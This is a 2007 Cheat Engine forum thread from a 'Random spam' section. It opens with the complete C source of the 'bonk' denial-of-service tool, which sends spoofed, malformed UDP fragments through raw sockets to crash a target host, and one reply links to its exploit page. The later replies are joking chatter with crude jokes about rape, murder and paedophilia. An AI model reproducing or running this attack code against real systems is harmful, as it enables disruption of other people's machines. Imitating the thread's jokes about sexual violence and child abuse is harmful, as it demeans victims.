Cheat Engine Forum Index Cheat Engine
The Official Site of Cheat Engine
 
 FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 


NOTHINGTOHEREHEREEXCEPTCANDY
Goto page 1, 2  Next
 
Post new topic   Reply to topic    Cheat Engine Forum Index -> Random spam
View previous topic :: View next topic  
Author Message
Xanatos
I post too much
Warning
Reputation: 18

Joined: 06 May 2007
Posts: 2559
Location: US

PostPosted: Tue Oct 30, 2007 3:00 pm    Post subject: NOTHINGTOHEREHEREEXCEPTCANDY Reply with quote

Tell me wut dis dus for da leet candyyy (its in the van).

*/

#include <stdio.h>
#include <string.h>

#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_udp.h>
#include <netinet/protocols.h>
#include <arpa/inet.h>

#define FRG_CONST 0x3
#define PADDING 0x1c

struct udp_pkt
{
struct iphdr ip;
struct udphdr udp;
char data[PADDING];
} pkt;

int udplen=sizeof(struct udphdr),
iplen=sizeof(struct iphdr),
datalen=100,
psize=sizeof(struct udphdr)+sizeof(struct iphdr)+PADDING,
spf_sck; /* Socket */

void usage(void)
{
fprintf(stderr, "Usage: ./bonk <src_addr> <dst_addr> [num]\n");
exit(0);
}

u_long host_to_ip(char *host_name)
{
static u_long ip_bytes;
struct hostent *res;

res = gethostbyname(host_name);
if (res == NULL)
return (0);
memcpy(&ip_bytes, res->h_addr, res->h_length);
return (ip_bytes);
}

void quit(char *reason)
{
perror(reason);
close(spf_sck);
exit(-1);
}

int fondle(int sck, u_long src_addr, u_long dst_addr, int src_prt,
int dst_prt)
{
int bs;
struct sockaddr_in to;

memset(&pkt, 0, psize);
/* Fill in ip header */
pkt.ip.version = 4;
pkt.ip.ihl = 5;
pkt.ip.tot_len = htons(udplen + iplen + PADDING);
pkt.ip.id = htons(0x455);
pkt.ip.ttl = 255;
pkt.ip.protocol = IP_UDP;
pkt.ip.saddr = src_addr;
pkt.ip.daddr = dst_addr;
pkt.ip.frag_off = htons(0x2000); /* more to come */

pkt.udp.source = htons(src_prt); /* udp header */
pkt.udp.dest = htons(dst_prt);
pkt.udp.len = htons(8 + PADDING);
/* send 1st frag */

to.sin_family = AF_INET;
to.sin_port = src_prt;
to.sin_addr.s_addr = dst_addr;

bs = sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to,
sizeof(struct sockaddr));

pkt.ip.frag_off = htons(FRG_CONST + 1); /* shinanigan */
pkt.ip.tot_len = htons(iplen + FRG_CONST);
/* 2nd frag */

bs = sendto(sck, &pkt, iplen + FRG_CONST + 1, 0,
(struct sockaddr *) &to, sizeof(struct sockaddr));

return bs;
}

void main(int argc, char *argv[])
{
u_long src_addr,
dst_addr;

int i,
src_prt=53,
dst_prt=53,
bs = 1,
pkt_count = 10; /* Default amount */

if (argc < 3)
usage();

if (argc == 4)
pkt_count = atoi(argv[3]); /* 10 does the trick */

/* Resolve hostnames */

src_addr = host_to_ip(argv[1]);
if (!src_addr)
quit("bad source host");
dst_addr = host_to_ip(argv[2]);
if (!dst_addr)
quit("bad target host");

spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (!spf_sck)
quit("socket()");
if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, (char *) &bs,
sizeof(bs)) < 0)
quit("IP_HDRINCL");

for (i = 0; i < pkt_count; ++i)
{
fondle(spf_sck, src_addr, dst_addr, src_prt, dst_prt);
usleep(10000);
}

printf("Done.\n");
}

_________________
Back to top
View user's profile Send private message
adamezra
Advanced Cheater
Reputation: 0

Joined: 14 Feb 2007
Posts: 73

PostPosted: Tue Oct 30, 2007 3:02 pm    Post subject: Reply with quote

Hello world!

my candy please
Back to top
View user's profile Send private message
Xanatos
I post too much
Warning
Reputation: 18

Joined: 06 May 2007
Posts: 2559
Location: US

PostPosted: Tue Oct 30, 2007 3:02 pm    Post subject: Reply with quote

Noez.
_________________
Back to top
View user's profile Send private message
Xanatos
I post too much
Warning
Reputation: 18

Joined: 06 May 2007
Posts: 2559
Location: US

PostPosted: Wed Oct 31, 2007 6:17 am    Post subject: Reply with quote

Go into the van Surprised...







ITS A TRAP! >=O

_________________
Back to top
View user's profile Send private message
Trucido
Moderator
Reputation: 6

Joined: 08 Sep 2007
Posts: 2792

PostPosted: Wed Oct 31, 2007 6:20 am    Post subject: mjummy.imma laggin Reply with quote

i like traps.







spesh the ones where i get raped and murdered.




this trap like that?
if not im not interested.






And do i need to bring clothes?

_________________
I'm out.
Back to top
View user's profile Send private message
[SWED] Faust
Ph'nglui mglw'nafh Cthulhu R'lyeh wgah'nagl fhtagn
Reputation: 6

Joined: 14 Apr 2007
Posts: 371
Location: Zug Izland

PostPosted: Wed Oct 31, 2007 6:22 am    Post subject: Reply with quote


_________________
Back to top
View user's profile Send private message Visit poster's website
Xanatos
I post too much
Warning
Reputation: 18

Joined: 06 May 2007
Posts: 2559
Location: US

PostPosted: Wed Oct 31, 2007 6:24 am    Post subject: Re: NOTHINGTOHEREHEREEXCEPTCANDY Reply with quote

xlcs wrote:
http://insecure.org/sploits/95.NT.fragmentation.bonk.html

candy now?


I know that, you get ze candy... BUTS ITS A TRAP Surprised.



YOu just got raped Wink.

Also how do I use deh leet codez? In WPE?

_________________
Back to top
View user's profile Send private message
Trucido
Moderator
Reputation: 6

Joined: 08 Sep 2007
Posts: 2792

PostPosted: Wed Oct 31, 2007 6:25 am    Post subject: Reply with quote

Faust_III wrote:



ROFL!

_________________
I'm out.
Back to top
View user's profile Send private message
[SWED] Faust
Ph'nglui mglw'nafh Cthulhu R'lyeh wgah'nagl fhtagn
Reputation: 6

Joined: 14 Apr 2007
Posts: 371
Location: Zug Izland

PostPosted: Wed Oct 31, 2007 6:26 am    Post subject: Reply with quote

i are getting teh buttsecks nao?
_________________
Back to top
View user's profile Send private message Visit poster's website
Trucido
Moderator
Reputation: 6

Joined: 08 Sep 2007
Posts: 2792

PostPosted: Wed Oct 31, 2007 6:28 am    Post subject: Reply with quote

does teh phree candy come with complimentary rape and murder?
if so im interested.

_________________
I'm out.
Back to top
View user's profile Send private message
[SWED] Faust
Ph'nglui mglw'nafh Cthulhu R'lyeh wgah'nagl fhtagn
Reputation: 6

Joined: 14 Apr 2007
Posts: 371
Location: Zug Izland

PostPosted: Wed Oct 31, 2007 6:29 am    Post subject: Reply with quote

ok... come on in...

/buttsecks

_________________
Back to top
View user's profile Send private message Visit poster's website
Trucido
Moderator
Reputation: 6

Joined: 08 Sep 2007
Posts: 2792

PostPosted: Wed Oct 31, 2007 6:31 am    Post subject: Reply with quote

YAY!!!

_________________
I'm out.
Back to top
View user's profile Send private message
Trucido
Moderator
Reputation: 6

Joined: 08 Sep 2007
Posts: 2792

PostPosted: Wed Oct 31, 2007 6:35 am    Post subject: Reply with quote




YAY PEDO STATUE!!!

_________________
I'm out.
Back to top
View user's profile Send private message
Xanatos
I post too much
Warning
Reputation: 18

Joined: 06 May 2007
Posts: 2559
Location: US

PostPosted: Wed Oct 31, 2007 6:42 am    Post subject: Reply with quote

LULZ!
_________________
Back to top
View user's profile Send private message
Trucido
Moderator
Reputation: 6

Joined: 08 Sep 2007
Posts: 2792

PostPosted: Wed Oct 31, 2007 6:50 am    Post subject: Reply with quote

xantos, that me and you baby!
_________________
I'm out.
Back to top
View user's profile Send private message
Display posts from previous:   
Post new topic   Reply to topic    Cheat Engine Forum Index -> Random spam All times are GMT - 6 Hours
Goto page 1, 2  Next
Page 1 of 2

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum


Powered by phpBB © 2001, 2005 phpBB Group

CE Wiki   IRC (#CEF)   Twitter
Third party websites